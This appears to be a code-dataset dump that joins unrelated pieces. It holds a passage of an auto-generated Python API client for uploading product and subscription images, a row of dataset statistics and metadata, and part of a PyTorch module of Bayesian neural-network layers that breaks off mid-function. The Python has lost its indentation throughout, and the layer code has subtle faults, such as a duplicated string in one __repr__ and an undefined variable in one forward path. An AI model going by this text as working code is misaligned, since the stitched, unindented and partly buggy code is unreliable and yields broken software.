This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.upload_product_cover(product_id, file, hash, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float product_id: Product ID to fetch (required)
:param file file: (required)
:param str hash: (required)
:param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.upload_product_cover_with_http_info(product_id, file, hash, **kwargs)
else:
(data) = self.upload_product_cover_with_http_info(product_id, file, hash, **kwargs)
return data
def upload_product_cover_with_http_info(self, product_id, file, hash, **kwargs):
"""
Upload product cover
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.upload_product_cover_with_http_info(product_id, file, hash, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float product_id: Product ID to fetch (required)
:param file file: (required)
:param str hash: (required)
:param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['product_id', 'file', 'hash', 'hash_algorithm']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method upload_product_cover" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'product_id' is set
if ('product_id' not in params) or (params['product_id'] is None):
raise ValueError("Missing the required parameter `product_id` when calling `upload_product_cover`")
# verify the required parameter 'file' is set
if ('file' not in params) or (params['file'] is None):
raise ValueError("Missing the required parameter `file` when calling `upload_product_cover`")
# verify the required parameter 'hash' is set
if ('hash' not in params) or (params['hash'] is None):
raise ValueError("Missing the required parameter `hash` when calling `upload_product_cover`")
collection_formats = {}
resource_path = '/products/{product_id}/cover'.replace('{format}', 'json')
path_params = {}
if 'product_id' in params:
path_params['product_id'] = params['product_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
if 'file' in params:
local_var_files['file'] = params['file']
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'hash' in params:
form_params.append(('hash', params['hash']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'hash_algorithm' in params:
form_params.append(('hash-algorithm', params['hash_algorithm']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
body_params = None
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['multipart/form-data'])
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def upload_product_image(self, product_id, file, hash, image_type_name, **kwargs):
"""
Upload product image
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.upload_product_image(product_id, file, hash, image_type_name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float product_id: Product ID to fetch (required)
:param file file: (required)
:param str hash: (required)
:param str image_type_name: Image types name to use to generate image assets (required)
:param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.upload_product_image_with_http_info(product_id, file, hash, image_type_name, **kwargs)
else:
(data) = self.upload_product_image_with_http_info(product_id, file, hash, image_type_name, **kwargs)
return data
def upload_product_image_with_http_info(self, product_id, file, hash, image_type_name, **kwargs):
"""
Upload product image
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.upload_product_image_with_http_info(product_id, file, hash, image_type_name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float product_id: Product ID to fetch (required)
:param file file: (required)
:param str hash: (required)
:param str image_type_name: Image types name to use to generate image assets (required)
:param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['product_id', 'file', 'hash', 'image_type_name', 'hash_algorithm']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method upload_product_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'product_id' is set
if ('product_id' not in params) or (params['product_id'] is None):
raise ValueError("Missing the required parameter `product_id` when calling `upload_product_image`")
# verify the required parameter 'file' is set
if ('file' not in params) or (params['file'] is None):
raise ValueError("Missing the required parameter `file` when calling `upload_product_image`")
# verify the required parameter 'hash' is set
if ('hash' not in params) or (params['hash'] is None):
raise ValueError("Missing the required parameter `hash` when calling `upload_product_image`")
# verify the required parameter 'image_type_name' is set
if ('image_type_name' not in params) or (params['image_type_name'] is None):
raise ValueError("Missing the required parameter `image_type_name` when calling `upload_product_image`")
collection_formats = {}
resource_path = '/products/{product_id}/image'.replace('{format}', 'json')
path_params = {}
if 'product_id' in params:
path_params['product_id'] = params['product_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
if 'file' in params:
local_var_files['file'] = params['file']
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'hash' in params:
form_params.append(('hash', params['hash']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'image_type_name' in params:
form_params.append(('image_type_name', params['image_type_name']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'hash_algorithm' in params:
form_params.append(('hash-algorithm', params['hash_algorithm']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
body_params = None
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['multipart/form-data'])
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def upload_subscription_cover(self, subscription_id, file, hash, **kwargs):
"""
Upload subscription cover
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.upload_subscription_cover(subscription_id, file, hash, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float subscription_id: Subscription ID to fetch (required)
:param file file: (required)
:param str hash: (required)
:param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.upload_subscription_cover_with_http_info(subscription_id, file, hash, **kwargs)
else:
(data) = self.upload_subscription_cover_with_http_info(subscription_id, file, hash, **kwargs)
return data
def upload_subscription_cover_with_http_info(self, subscription_id, file, hash, **kwargs):
"""
Upload subscription cover
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.upload_subscription_cover_with_http_info(subscription_id, file, hash, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float subscription_id: Subscription ID to fetch (required)
:param file file: (required)
:param str hash: (required)
:param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['subscription_id', 'file', 'hash', 'hash_algorithm']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method upload_subscription_cover" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'subscription_id' is set
if ('subscription_id' not in params) or (params['subscription_id'] is None):
raise ValueError("Missing the required parameter `subscription_id` when calling `upload_subscription_cover`")
# verify the required parameter 'file' is set
if ('file' not in params) or (params['file'] is None):
raise ValueError("Missing the required parameter `file` when calling `upload_subscription_cover`")
# verify the required parameter 'hash' is set
if ('hash' not in params) or (params['hash'] is None):
raise ValueError("Missing the required parameter `hash` when calling `upload_subscription_cover`")
collection_formats = {}
resource_path = '/subscriptions/{subscription_id}/cover'.replace('{format}', 'json')
path_params = {}
if 'subscription_id' in params:
path_params['subscription_id'] = params['subscription_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
if 'file' in params:
local_var_files['file'] = params['file']
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'hash' in params:
form_params.append(('hash', params['hash']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'hash_algorithm' in params:
form_params.append(('hash-algorithm', params['hash_algorithm']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
body_params = None
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['multipart/form-data'])
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 44.150071 | 131 | 0.577171 | 9,624 | 92,671 | 5.310682 | 0.020677 | 0.05948 | 0.020818 | 0.026766 | 0.983995 | 0.97838 | 0.971649 | 0.96214 | 0.952436 | 0.949129 | 0 | 0.000801 | 0.33988 | 92,671 | 2,098 | 132 | 44.171115 | 0.834685 | 0.302425 | 0 | 0.822034 | 1 | 0 | 0.198978 | 0.058928 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036723 | false | 0 | 0.006591 | 0 | 0.097928 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5cf54a6c626ebac3deb7e66260e1b9d1a0e731fa | 30,712 | py | Python | core/layers.py | markovalexander/DVI | 76d1c2261e48d5d804af50b9037c6cd650eb95c2 | [
"MIT"
] | 13 | 2019-09-20T18:01:05.000Z | 2021-03-18T12:57:11.000Z | core/layers.py | markovalexander/DVI | 76d1c2261e48d5d804af50b9037c6cd650eb95c2 | [
"MIT"
] | null | null | null | core/layers.py | markovalexander/DVI | 76d1c2261e48d5d804af50b9037c6cd650eb95c2 | [
"MIT"
] | null | null | null | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions import MultivariateNormal, Independent, Normal
from .bayesian_utils import kl_gaussian, softrelu, matrix_diag_part, kl_loguni, \
compute_linear_var, compute_relu_var, standard_gaussian, gaussian_cdf, \
compute_heaviside_var
EPS = 1e-6
class LinearGaussian(nn.Module):
def __init__(self, in_features, out_features, certain=False,
deterministic=True):
"""
Applies linear transformation y = xA^T + b
A and b are Gaussian random variables
:param in_features: input dimension
:param out_features: output dimension
:param certain: if true, than x is equal to its mean and has no variance
"""
super().__init__()
self.in_features = in_features
self.out_features = out_features
self.W = nn.Parameter(torch.Tensor(in_features, out_features))
self.bias = nn.Parameter(torch.Tensor(out_features))
self.W_logvar = nn.Parameter(torch.Tensor(in_features, out_features))
self.bias_logvar = nn.Parameter(torch.Tensor(out_features))
self._initialize_weights()
self._construct_priors()
self.certain = certain
self.deterministic = deterministic
self.mean_forward = False
self.zero_mean = False
def _initialize_weights(self):
nn.init.xavier_normal_(self.W)
nn.init.normal_(self.bias)
nn.init.uniform_(self.W_logvar, a=-10, b=-7)
nn.init.uniform_(self.bias_logvar, a=-10, b=-7)
def _construct_priors(self):
self.W_mean_prior = nn.Parameter(torch.zeros_like(self.W),
requires_grad=False)
self.W_var_prior = nn.Parameter(torch.ones_like(self.W_logvar) * 0.1,
requires_grad=False)
self.bias_mean_prior = nn.Parameter(torch.zeros_like(self.bias),
requires_grad=False)
self.bias_var_prior = nn.Parameter(
torch.ones_like(self.bias_logvar) * 0.1,
requires_grad=False)
def _get_var(self, param):
return torch.exp(param)
def compute_kl(self):
weights_kl = kl_gaussian(self.W, self._get_var(self.W_logvar),
self.W_mean_prior, self.W_var_prior)
bias_kl = kl_gaussian(self.bias, self._get_var(self.bias_logvar),
self.bias_mean_prior, self.bias_var_prior)
return weights_kl + bias_kl
def set_flag(self, flag_name, value):
setattr(self, flag_name, value)
for m in self.children():
if hasattr(m, 'set_flag'):
m.set_flag(flag_name, value)
def forward(self, x):
"""
Compute expectation and variance after linear transform
y = xA^T + b
:param x: input, size [batch, in_features]
:return: tuple (y_mean, y_var) for deterministic mode:, shapes:
y_mean: [batch, out_features]
y_var: [batch, out_features, out_features]
tuple (sample, None) for MCVI mode,
sample : [batch, out_features] - local reparametrization of output
"""
x = self._apply_activation(x)
if self.zero_mean:
return self._zero_mean_forward(x)
elif self.mean_forward:
return self._mean_forward(x)
elif self.deterministic:
return self._det_forward(x)
else:
return self._mcvi_forward(x)
def _mcvi_forward(self, x):
W_var = self._get_var(self.W_logvar)
bias_var = self._get_var(self.bias_logvar)
if self.certain:
x_mean = x
x_var = None
else:
x_mean = x[0]
x_var = x[1]
y_mean = F.linear(x_mean, self.W.t()) + self.bias
if self.certain or not self.deterministic:
xx = x_mean * x_mean
y_var = torch.diag_embed(F.linear(xx, W_var.t()) + bias_var)
else:
y_var = compute_linear_var(x_mean, x_var, self.W, W_var, self.bias,
bias_var)
dst = MultivariateNormal(loc=y_mean, covariance_matrix=y_var)
sample = dst.rsample()
return sample, None
def _det_forward(self, x):
W_var = self._get_var(self.W_logvar)
bias_var = self._get_var(self.bias_logvar)
if self.certain:
x_mean = x
x_var = None
else:
x_mean = x[0]
x_var = x[1]
y_mean = F.linear(x_mean, self.W.t()) + self.bias
if self.certain or x_var is None:
xx = x_mean * x_mean
y_var = torch.diag_embed(F.linear(xx, W_var.t()) + bias_var)
else:
y_var = compute_linear_var(x_mean, x_var, self.W, W_var, self.bias,
bias_var)
return y_mean, y_var
def _mean_forward(self, x):
if not isinstance(x, tuple):
x_mean = x
else:
x_mean = x[0]
y_mean = F.linear(x_mean, self.W.t()) + self.bias
return y_mean, None
def _zero_mean_forward(self, x):
if not isinstance(x, tuple):
x_mean = x
x_var = None
else:
x_mean = x[0]
x_var = x[1]
y_mean = F.linear(x_mean, torch.zeros_like(self.W).t()) + self.bias
W_var = self._get_var(self.W_logvar)
bias_var = self._get_var(self.bias_logvar)
if x_var is None:
xx = x_mean * x_mean
y_var = torch.diag_embed(F.linear(xx, W_var.t()) + bias_var)
else:
y_var = compute_linear_var(x_mean, x_var, torch.zeros_like(self.W),
W_var, self.bias, bias_var)
if self.deterministic:
return y_mean, y_var
else:
dst = MultivariateNormal(loc=y_mean, covariance_matrix=y_var)
sample = dst.rsample()
return sample, None
def _apply_activation(self, x):
return x
def __repr__(self):
return self.__class__.__name__ + '(' \
+ 'in_features=' + str(self.in_features) \
+ ', out_features=' + str(self.out_features) + ')'
class ReluGaussian(LinearGaussian):
def _apply_activation(self, x):
if isinstance(x, tuple):
x_mean = x[0]
x_var = x[1]
else:
x_mean = x
x_var = None
if x_var is None:
z_mean = F.relu(x_mean)
z_var = None
else:
x_var_diag = matrix_diag_part(x_var)
sqrt_x_var_diag = torch.sqrt(x_var_diag + EPS)
mu = x_mean / (sqrt_x_var_diag + EPS)
z_mean = sqrt_x_var_diag * softrelu(mu)
z_var = compute_relu_var(x_var, x_var_diag, mu)
return z_mean, z_var
class HeavisideGaussian(LinearGaussian):
def _apply_activation(self, x):
x_mean = x[0]
x_var = x[1]
if x_var is None:
x_var = x_mean * x_mean
x_var_diag = matrix_diag_part(x_var)
sqrt_x_var_diag = torch.sqrt(x_var_diag)
mu = x_mean / (sqrt_x_var_diag + EPS)
z_mean = gaussian_cdf(mu)
z_var = compute_heaviside_var(x_var, x_var_diag, mu)
return z_mean, z_var
class DeterministicGaussian(LinearGaussian):
def __init__(self, in_features, out_features, certain=False,
deterministic=True):
"""
Applies linear transformation y = xA^T + b
A and b are Gaussian random variables
:param in_features: input dimension
:param out_features: output dimension
:param certain: if true, than x is equal to its mean and has no variance
"""
super().__init__(in_features, out_features, certain, deterministic)
self.W_logvar.requires_grad = False
self.bias_logvar.requires_grad = False
def compute_kl(self):
return 0
class DeterministicReluGaussian(ReluGaussian):
def __init__(self, in_features, out_features, certain=False,
deterministic=True):
"""
Applies linear transformation y = xA^T + b
A and b are Gaussian random variables
:param in_features: input dimension
:param out_features: output dimension
:param certain: if true, than x is equal to its mean and has no variance
"""
super().__init__(in_features, out_features, certain, deterministic)
self.W_logvar.requires_grad = False
self.bias_logvar.requires_grad = False
def compute_kl(self):
return 0
class LinearVDO(nn.Module):
def __init__(self, in_features, out_features, prior='loguni',
alpha_shape=(1, 1), bias=True, deterministic=True):
super(LinearVDO, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.alpha_shape = alpha_shape
self.W = nn.Parameter(torch.Tensor(out_features, in_features))
self.log_alpha = nn.Parameter(torch.Tensor(*alpha_shape))
if bias:
self.bias = nn.Parameter(torch.Tensor(1, out_features))
else:
self.register_parameter('bias', None)
self.reset_parameters()
self.zero_mean = False
self.permute_sigma = False
self.prior = prior
self.kl_fun = kl_loguni
self.deterministic = deterministic
def reset_parameters(self):
stdv = 1. / math.sqrt(self.W.size(1))
self.W.data.uniform_(-stdv, stdv)
self.log_alpha.data.fill_(-5.0)
if self.bias is not None:
self.bias.data.zero_()
def forward(self, x):
if self.deterministic:
return self._det_forward(x)
else:
return self._mc_forward(x)
def _mc_forward(self, x):
if isinstance(x, tuple):
x_mean = x[0]
x_var = x[1]
else:
x_mean = x
if self.zero_mean:
lrt_mean = 0.0
else:
lrt_mean = F.linear(x_mean, self.W)
if self.bias is not None:
lrt_mean = lrt_mean + self.bias
sigma2 = torch.exp(self.log_alpha) * self.W * self.W
if self.permute_sigma:
sigma2 = sigma2.view(-1)[torch.randperm(
self.in_features * self.out_features).cuda()].view(
self.out_features, self.in_features)
if x_var is None:
x_var = torch.diag_embed(x_mean * x_mean)
lrt_cov = compute_linear_var(x_mean, x_var, self.W.t(), sigma2.t())
dst = MultivariateNormal(lrt_mean, covariance_matrix=lrt_cov)
return dst.rsample(), None
def compute_kl(self):
return self.W.nelement() * self.kl_fun(
self.log_alpha) / self.log_alpha.nelement()
def __repr__(self):
return self.__class__.__name__ + '(' \
+ 'in_features=' + str(self.in_features) \
+ ', out_features=' + str(self.out_features) \
+ ', alpha_shape=' + str(self.alpha_shape) \
+ ', prior=' + self.prior \
+ ', bias=' + str(self.bias is not None) + ')' ', bias=' + str(
self.bias is not None) + ')'
def _det_forward(self, x):
if isinstance(x, tuple):
x_mean = x[0]
x_var = x[1]
else:
x_mean = x
x_var = torch.diag_embed(x_mean * x_mean)
batch_size = x_mean.size(0)
sigma2 = torch.exp(self.log_alpha) * self.W * self.W
if self.zero_mean:
y_mean = torch.zeros(batch_size, self.out_features).to(
x_mean.device)
else:
y_mean = F.linear(x_mean, self.W)
if self.bias is not None:
y_mean = y_mean + self.bias
y_var = compute_linear_var(x_mean, x_var, self.W.t(), sigma2.t())
return y_mean, y_var
def set_flag(self, flag_name, value):
setattr(self, flag_name, value)
for m in self.children():
if hasattr(m, 'set_flag'):
m.set_flag(flag_name, value)
class ReluVDO(LinearVDO):
def forward(self, x):
x = self._apply_activation(x)
return super().forward(x)
def _apply_activation(self, x):
if isinstance(x, tuple):
x_mean = x[0]
x_var = x[1]
else:
x_mean = x
x_var = None
if x_var is None:
z_mean = F.relu(x_mean)
z_var = None
else:
x_var_diag = matrix_diag_part(x_var)
sqrt_x_var_diag = torch.sqrt(x_var_diag + EPS)
mu = x_mean / (sqrt_x_var_diag + EPS)
z_mean = sqrt_x_var_diag * softrelu(mu)
z_var = compute_relu_var(x_var, x_var_diag, mu)
return z_mean, z_var
class HeavisideVDO(LinearVDO):
def forward(self, x):
x = self._apply_activation(x)
return super().forward(x)
def _apply_activation(self, x):
x_mean = x[0]
x_var = x[1]
if x_var is None:
x_var = x_mean * x_mean
x_var_diag = matrix_diag_part(x_var)
sqrt_x_var_diag = torch.sqrt(x_var_diag)
mu = x_mean / (sqrt_x_var_diag + EPS)
z_mean = gaussian_cdf(mu)
z_var = compute_heaviside_var(x_var, x_var_diag, mu)
return z_mean, z_var
class VarianceGaussian(LinearGaussian):
def __init__(self, in_features, out_features,
certain=False, deterministic=True, sigma_sq=False):
super().__init__(in_features, out_features, certain, deterministic)
self.W.data.fill_(0)
self.W.requires_grad = False
self.sigma_sq = sigma_sq
if sigma_sq:
self.W_logvar.data.uniform_(-1 / (in_features + out_features),
1 / (in_features + out_features))
self.bias_logvar.data.uniform_(-1 / out_features, 1 / out_features)
def _zero_mean_forward(self, x):
if self.deterministic:
return self._det_forward(x)
else:
return self._mcvi_forward(x)
def _get_var(self, param):
if self.sigma_sq:
return param * param
else:
return torch.exp(param)
def compute_kl(self):
return 0
class VarianceReluGaussian(ReluGaussian):
def __init__(self, in_features, out_features,
certain=False, deterministic=True, sigma_sq=False):
super().__init__(in_features, out_features, certain, deterministic)
self.W.data.fill_(0)
self.W.requires_grad = False
self.sigma_sq = sigma_sq
if sigma_sq:
self.W_logvar.data.uniform_(-1 / (in_features + out_features),
1 / (in_features + out_features))
self.bias_logvar.data.uniform_(-1 / out_features, 1 / out_features)
def _get_var(self, param):
if self.sigma_sq:
return param * param
else:
return torch.exp(param)
def _zero_mean_forward(self, x):
if self.deterministic:
return self._det_forward(x)
else:
return self._mcvi_forward(x)
def compute_kl(self):
return 0
class MeanFieldConv2d(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
activation='relu', padding=0, certain=False,
deterministic=True):
super().__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.stride = stride
self.padding = padding
self.activation = activation.strip().lower()
if not isinstance(kernel_size, tuple):
kernel_size = (kernel_size, kernel_size)
self.kernel_size = kernel_size
self.W = nn.Parameter(
torch.Tensor(out_channels, in_channels, *self.kernel_size))
self.W_logvar = nn.Parameter(
torch.Tensor(out_channels, in_channels, *self.kernel_size))
self.bias = nn.Parameter(torch.Tensor(out_channels))
self.bias_logvar = nn.Parameter(torch.Tensor(out_channels))
self._initialize_weights()
self._construct_priors()
self.certain = certain
self.deterministic = deterministic
self.mean_forward = False
self.zero_mean = False
def _initialize_weights(self):
nn.init.xavier_normal_(self.W)
nn.init.normal_(self.bias)
nn.init.uniform_(self.W_logvar, a=-10, b=-7)
nn.init.uniform_(self.bias_logvar, a=-10, b=-7)
def _get_var(self, param):
return torch.exp(param)
def _construct_priors(self):
self.W_mean_prior = nn.Parameter(torch.zeros_like(self.W),
requires_grad=False)
self.W_var_prior = nn.Parameter(torch.ones_like(self.W_logvar) * 0.1,
requires_grad=False)
self.bias_mean_prior = nn.Parameter(torch.zeros_like(self.bias),
requires_grad=False)
self.bias_var_prior = nn.Parameter(
torch.ones_like(self.bias_logvar) * 0.1,
requires_grad=False)
def compute_kl(self):
weights_kl = kl_gaussian(self.W, self._get_var(self.W_logvar),
self.W_mean_prior, self.W_var_prior)
bias_kl = kl_gaussian(self.bias, self._get_var(self.bias_logvar),
self.bias_mean_prior, self.bias_var_prior)
return weights_kl + bias_kl
def set_flag(self, flag_name, value):
setattr(self, flag_name, value)
for m in self.children():
if hasattr(m, 'set_flag'):
m.set_flag(flag_name, value)
def forward(self, x):
x = self._apply_activation(x)
if self.zero_mean:
return self._zero_mean_forward(x)
elif self.mean_forward:
return self._mean_forward(x)
elif self.deterministic:
return self._det_forward(x)
else:
return self._mcvi_forward(x)
def _zero_mean_forward(self, x):
if self.certain or not self.deterministic:
x_mean = x if not isinstance(x, tuple) else x[0]
x_var = x_mean * x_mean
else:
x_mean = x[0]
x_var = x[1]
W_var = self._get_var(self.W_logvar)
bias_var = self._get_var(self.bias_logvar)
z_mean = F.conv2d(x_mean, torch.zeros_like(self.W), self.bias,
self.stride,
self.padding)
z_var = F.conv2d(x_var, W_var, bias_var, self.stride,
self.padding)
if self.deterministic:
return z_mean, z_var
else:
dst = Independent(Normal(z_mean, z_var), 1)
sample = dst.rsample()
return sample, None
def _mean_forward(self, x):
if not isinstance(x, tuple):
x_mean = x
else:
x_mean = x[0]
z_mean = F.conv2d(x_mean, self.W, self.bias,
self.stride,
self.padding)
return z_mean, None
def _det_forward(self, x):
if self.certain and isinstance(x, tuple):
x_mean = x[0]
x_var = x_mean * x_mean
elif not self.certain:
x_mean = x[0]
x_var = x[1]
else:
x_mean = x
x_var = x_mean * x_mean
W_var = self._get_var(self.W_logvar)
bias_var = self._get_var(self.bias_logvar)
z_mean = F.conv2d(x_mean, self.W, self.bias,
self.stride,
self.padding)
z_var = F.conv2d(x_var, W_var, bias_var, self.stride,
self.padding)
return z_mean, z_var
def _mcvi_forward(self, x):
if self.certain or not self.deterministic:
x_mean = x if not isinstance(x, tuple) else x[0]
x_var = x_mean * x_mean
else:
x_mean = x[0]
x_var = x[1]
W_var = self._get_var(self.W_logvar)
bias_var = self._get_var(self.bias_logvar)
z_mean = F.conv2d(x_mean, self.W, self.bias,
self.stride,
self.padding)
z_var = F.conv2d(x_var, W_var, bias_var, self.stride,
self.padding)
dst = Independent(Normal(z_mean, z_var), 1)
sample = dst.rsample()
return sample, None
def _apply_activation(self, x):
if self.activation == 'relu' and not self.certain:
x_mean, x_var = x
if x_var is None:
x_var = x_mean * x_mean
sqrt_x_var = torch.sqrt(x_var + EPS)
mu = x_mean / sqrt_x_var
z_mean = sqrt_x_var * softrelu(mu)
z_var = x_var * (mu * standard_gaussian(mu) + (
1 + mu ** 2) * gaussian_cdf(mu))
return z_mean, z_var
else:
return x
def set_flag(self, flag_name, value):
setattr(self, flag_name, value)
for m in self.children():
if hasattr(m, 'set_flag'):
m.set_flag(flag_name, value)
def __repr__(self):
return self.__class__.__name__ + '(' \
+ 'in_channels=' + str(self.in_channels) \
+ ', out_channels=' + str(self.out_channels) \
+ ', kernel_size=' + str(self.kernel_size) \
+ ', stride=' + str(self.stride) \
+ ', padding=' + str(self.padding) \
+ ', activation=' + str(self.activation) + ')'
class VarianceMeanFieldConv2d(MeanFieldConv2d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
activation='relu', padding=0, certain=False,
deterministic=True, sigma_sq=False):
super().__init__(in_channels, out_channels, kernel_size, stride,
activation, padding, certain, deterministic)
self.W.data.fill_(0)
self.W.requires_grad = False
self.sigma_sq = sigma_sq
if sigma_sq:
self.W_logvar.data.uniform_(-1 / (in_channels + out_channels),
1 / (in_channels + out_channels))
self.bias_logvar.data.uniform_(-1 / out_channels, 1 / out_channels)
def _get_var(self, param):
if self.sigma_sq:
return param * param
else:
return torch.exp(param)
def compute_kl(self):
return 0
def _zero_mean_forward(self, x):
if self.deterministic:
return self._det_forward(x)
else:
return self._mcvi_forward(x)
class MeanFieldConv2dVDO(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, alpha_shape,
certain=False, activation='relu', deterministic=True, stride=1,
padding=0, dilation=1, prior='loguni', bias=True):
super().__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = (kernel_size, kernel_size)
self.stride = stride
self.padding = padding
self.activation = activation
self.dilation = dilation
self.alpha_shape = alpha_shape
self.groups = 1
self.weight = nn.Parameter(
torch.Tensor(out_channels, in_channels, *self.kernel_size))
if bias:
self.bias = nn.Parameter(torch.Tensor(1, out_channels, 1, 1))
else:
self.register_parameter('bias', None)
self.op_bias = lambda input, kernel: F.conv2d(input, kernel,
self.bias.flatten(),
self.stride, self.padding,
self.dilation,
self.groups)
self.op_nobias = lambda input, kernel: F.conv2d(input, kernel, None,
self.stride,
self.padding,
self.dilation,
self.groups)
self.log_alpha = nn.Parameter(torch.Tensor(*alpha_shape))
self.reset_parameters()
self.certain = certain
self.deterministic = deterministic
self.mean_forward = False
self.zero_mean = False
self.permute_sigma = False
self.prior = prior
self.kl_fun = kl_loguni
def reset_parameters(self):
n = self.in_channels
for k in self.kernel_size:
n *= k
stdv = 1. / math.sqrt(n)
self.weight.data.uniform_(-stdv, stdv)
if self.bias is not None:
self.bias.data.uniform_(-stdv, stdv)
self.log_alpha.data.fill_(-5.0)
def forward(self, x):
x = self._apply_activation(x)
if self.zero_mean:
return self._zero_mean_forward(x)
elif self.mean_forward:
return self._mean_forward(x)
elif self.deterministic:
return self._det_forward(x)
else:
return self._mcvi_forward(x)
def _apply_activation(self, x):
if self.activation == 'relu' and not self.certain:
x_mean, x_var = x
if x_var is None:
x_var = x_mean * x_mean
sqrt_x_var = torch.sqrt(x_var + EPS)
mu = x_mean / sqrt_x_var
z_mean = sqrt_x_var * softrelu(mu)
